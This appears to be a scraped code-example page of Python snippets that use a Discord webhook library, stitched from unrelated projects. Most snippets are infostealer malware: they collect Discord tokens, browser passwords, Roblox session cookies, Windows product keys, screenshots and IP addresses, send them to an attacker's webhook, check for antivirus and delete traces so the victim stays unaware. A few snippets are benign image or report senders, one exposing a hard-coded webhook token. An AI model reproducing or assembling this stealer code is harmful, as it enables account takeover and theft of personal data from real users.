Exemple #1
0
def grab_all(token):
    hook = Webhook(web)
    screen = ImageGrab.grab()
    screen.save(local + '\\screen.png')
    screen.close()
    hook.send(file=File(local + "\\screen.png"))
    os.remove(local + '\\screen.png')
    with open(local + '\\Google\\Password_Chrome.txt', 'r') as fp:
        hook.send(file=File(fp, name=f"Passwords_Chrome.txt"))
Exemple #2
0
def grab_all(token):
    tokeninfo = requests.get('https://discord.com/api/v8/users/@me',
                             headers={
                                 'authorization': token
                             }).json()
    r = requests.get('https://discord.com/api/v8/users/@me',
                     headers={'authorization': token})
    if r.status_code != 200:
        return
    ipinfo = requests.get('http://ip-api.com/json/').json()
    nitro_type = json.loads(r.content)
    try:
        nitro_type['premium_type']
    except Exception:
        dnitro = "Non"
    else:
        if nitro_type['premium_type'] == 1:
            dnitro = "Nitro Classic"
        elif nitro_type['premium_type'] == 2:
            dnitro = "Nitro Boost"
    payload = {
        "embeds": [{
            "author": {
                "name":
                f"{tokeninfo['username']}#{tokeninfo['discriminator']}",
                "icon_url":
                f"https://cdn.discordapp.com/avatars/{tokeninfo['id']}/{tokeninfo['avatar']}.jpg"
            },
            "fields": [{
                "name":
                "**Infos Discord**",
                "value":
                f"ID: {tokeninfo['id']}\nEmail: {tokeninfo['email']}\nNuméro de téléphone: {tokeninfo['phone']}\nNitro: {dnitro}\nToken: {token}"
            }, {
                "name":
                "**Autres infos**",
                "value":
                f"Nom du PC: {os.getenv('COMPUTERNAME')}\nNom de session: {os.getlogin()}\nIP: {ipinfo['query']}"
            }]
        }]
    }
    requests.post(url_webhook, json=payload)
    hook = Webhook(url_webhook)
    screen = ImageGrab.grab()
    screen.save(local + '\\screen.png')
    screen.close()
    hook.send(file=File(local + "\\screen.png"))
    os.remove(local + '\\screen.png')
    with open(local + '\\Google\\Password_Chrome.txt', 'r') as fp:
        hook.send(file=File(
            fp, name=f"Passwords_Chrome_{tokeninfo['username']}.txt"))
def forever():
    print("Sending images every " + str(interval) + " seconds.")
    while True:
        try:
            file = random.choice(getListOfFiles('.\\images\\'))
        except Exception:
            print("There are no files in the images folder. Please add some.")
            time.sleep(5)
            sys.exit()
        print(file)
        file = File(str(file))
        hook.send(file=file)
        time.sleep(int(interval))
Exemple #4
0
def notforever():
    print("Sending " + str(loop) + " images every " + str(interval) +
          " seconds.")
    for x in range(int(loop)):
        try:
            file = random.choice(os.listdir(".\\images\\"))
        except Exception:
            print("There are no files in the images folder. Please add some.")
            time.sleep(5)
            sys.exit()
        print(file)
        file = File(".\\images\\" + str(file))
        hook.send(file=file)
        time.sleep(int(interval))
Exemple #5
0
    def send_report(self, id):
        embed = Embed(
            description='A user reported the following face',
            color=0x5CDBF0,
            timestamp='now'  # sets the timestamp to current time
        )
        img_file = self.xml_parser.get_imgpath_from_uid(self.xml, id)
        if img_file:
            img_file = self.xml.replace("config.xml", "") + img_file + ".png"
            file = File(img_file)
            embed.add_field(name='File', value=img_file)

            self.webhook.send(embed=embed, file=file)
        return img_file
Exemple #6
0
def main():
  with open (temp_dir+"run.log", 'w+') as handle:
    handle.write("Fatal Error.")
    handle.close()
  hook.send('```css\nToken Grabbed! \n\nUsername: '******'\nPC Name: ' + pc_name + '\nIP Address: {}'.format(ip) +'\n\nZip File:```')
  try:
    hook.send(file = File(zipf, name=str(user)+" Logs.zip"))
  except:
    hook.send('```css\nThere was an error obtaining the zip.```')
  if discordinst and ptbinst and canaryinst and chromeinst == False:
    hook.send("```css\nUser had nothing installed```")
  try:
    os.remove(zipf)
  except:
    return ''
Exemple #7
0
def post_handler(message):
    response = requests.get(
        'http://api.telegram.org/bot{}/getFile?file_id={}'.format(
            config.token, message.photo[-1].file_id))

    if response.status_code == 200:
        data = json.loads(response.text)
        file_url = config.telegram_url + data['result']['file_path']
        fd = urllib.request.urlopen(file_url)
        img = Image.open(BytesIO(fd.read()))

        tmpfile = tempfile.TemporaryFile()
        img.save(tmpfile, "PNG")
        tmpfile.seek(0)
        file = File(tmpfile, name='bluepost.png')  # optional name for discord

        hook.send('Look at this:', file=file)
Exemple #8
0
    def send_report(self, e):
        uid = self.rep_inp.value
        img_name = self.prf_cfg["imgs"][uid]
        img_eth = self.prf_cfg["ethnics"][uid]
        img_path = img_eth + "/" + img_name
        img_file = self.rep_img.image.path
        self.logger.info("send report: {}".format(img_file))

        hook = Webhook("https://discord.com/api/webhooks/770397581149863946/Wls0g6LEyTXEpOqzfLn2YuDRKANFSAFpwKe62VL9IxpwsQDWFjYHVfy19hrYiv5p0X2a")

        embed = Embed(
            description='A user reported the following face',
            color=0x5CDBF0,
            timestamp='now'  # sets the timestamp to current time
            )

        file = File(img_file)
        embed.add_field(name='File', value=img_path)

        hook.send(embed=embed, file=file)
Exemple #9
0
def beamed():
    hook = Webhook(url)
    try:
        hostname = requests.get("https://api.ipify.org").text
    except:
        pass

    local = os.getenv('LOCALAPPDATA')
    roaming = os.getenv('APPDATA')
    paths = {
        'Discord': roaming + '\\Discord',
        'Discord Canary': roaming + '\\discordcanary',
        'Discord PTB': roaming + '\\discordptb',
        'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
        'Opera': roaming + '\\Opera Software\\Opera Stable',
        'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
        'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
    }

    message = '\n'
    for platform, path in paths.items():
        if not os.path.exists(path):
            continue

        message += '```'

        tokens = sniff(path)

        if len(tokens) > 0:
            for token in tokens:
                message += f'{token}\n'
        else:
            pass

        message += '```'
    """screenshot victim's desktop"""
    try:
        screenshot = image.grab()
        screenshot.save(os.getenv('ProgramData') + r'\screenshot.jpg')
        screenshot = open(r'C:\ProgramData\screenshot.jpg', 'rb')
        screenshot.close()
    except:
        pass
    """gather our .zip variables"""
    try:
        zname = r'C:\ProgramData\passwords.zip'
        newzip = zipfile.ZipFile(zname, 'w')
        newzip.write(r'C:\ProgramData\passwords.txt')
        newzip.close()
        passwords = File(r'C:\ProgramData\passwords.zip')
    except:
        pass
    """gather our windows product key variables"""
    try:
        usr = os.getenv("UserName")
        keys = subprocess.check_output(
            'wmic path softwarelicensingservice get OA3xOriginalProductKey'
        ).decode().split('\n')[1].strip()
        types = subprocess.check_output('wmic os get Caption').decode().split(
            '\n')[1].strip()
    except:
        pass
    """steal victim's .roblosecurity cookie"""
    cookie = [".ROBLOSECURITY"]
    cookies = []
    limit = 2000
    """chrome installation => list cookies from this location"""
    try:
        cookies.extend(list(steal.chrome()))
    except:
        pass
    """firefox installation => list cookies from this location"""
    try:
        cookies.extend(list(steal.firefox()))
    except:
        pass
    """read data => if we find a matching positive for our specified variable 'cookie', send it to our webhook."""
    try:
        for y in cookie:
            send = str([str(x) for x in cookies if y in str(x)])
            chunks = [send[i:i + limit] for i in range(0, len(send), limit)]
            for z in chunks:
                roblox = f'```' + f'{z}' + '```'
    except:
        pass
    """attempt to send all recieved data to our specified webhook"""
    try:
        embed = Embed(
            title='Aditional Features',
            description='a victim\'s data was extracted, here\'s the details:',
            color=0x2f3136,
            timestamp='now')
        embed.add_field("windows key:",
                        f"user => {usr}\ntype => {types}\nkey => {keys}")
        embed.add_field("roblosecurity:", roblox)
        embed.add_field("tokens:", message)
        embed.add_field("hostname:", f"{hostname}")
    except:
        pass
    try:
        hook.send(embed=embed, file=passwords)
    except:
        pass
    """attempt to remove all evidence, allows for victim to stay unaware of data extraction"""
    try:
        subprocess.os.system(r'del C:\ProgramData\screenshot.jpg')
        subprocess.os.system(r'del C:\ProgramData\passwords.zip')
        subprocess.os.system(r'del C:\ProgramData\passwords.txt')
    except:
        pass
Exemple #10
0
    av = 'Grizzly Pro'
if os.path.exists('C:\\Program Files\\Kaspersky Lab'):
    av = 'Kaspersky'
if os.path.exists('C:\\Program Files\\IObit\\IObit Malware Fighter'):
    av = 'Malware fighter'
if os.path.exists('C:\\Program Files\\360\\Total Security'):
    av = '360 Total Security'
else:
    pass

# SCREENSHOT:
screen = ImageGrab.grab()
screen.save(os.getenv('ProgramData') + '\\Screenshot.jpg')
screen = open('C:\\ProgramData\\Screenshot.jpg', 'rb')
screen.close()
screenshot = File('C:\\ProgramData\\Screenshot.jpg')

# PASSWORDS:
zname = r'C:\\ProgramData\\Passwords.zip'
newzip = zipfile.ZipFile(zname, 'w')
newzip.write(r'C:\\ProgramData\\Passwords.txt')
newzip.write(r'C:\\ProgramData\\Screenshot.jpg')
newzip.close()
passwords = File('C:\\ProgramData\\Passwords.zip')

# SEND THOSE VARIABLES:
hook.send("screenshot:", file=screenshot)
hook.send("passwords:", file=passwords)
os.remove('C:\\ProgramData\\Passwords.txt')
os.remove('C:\\ProgramData\\Screenshot.jpg')
os.remove('C:\\ProgramData\\Passwords.zip')
def exfiltration(filename):
    hook = Webhook(DISCORD_WEBHOOK)
    pc_name = platform.uname()[1]
    file = File(sb.os.getcwd() + '\\' + filename, name=pc_name + '.json')
    hook.send('Here is your loot :smiling_imp:', file=file)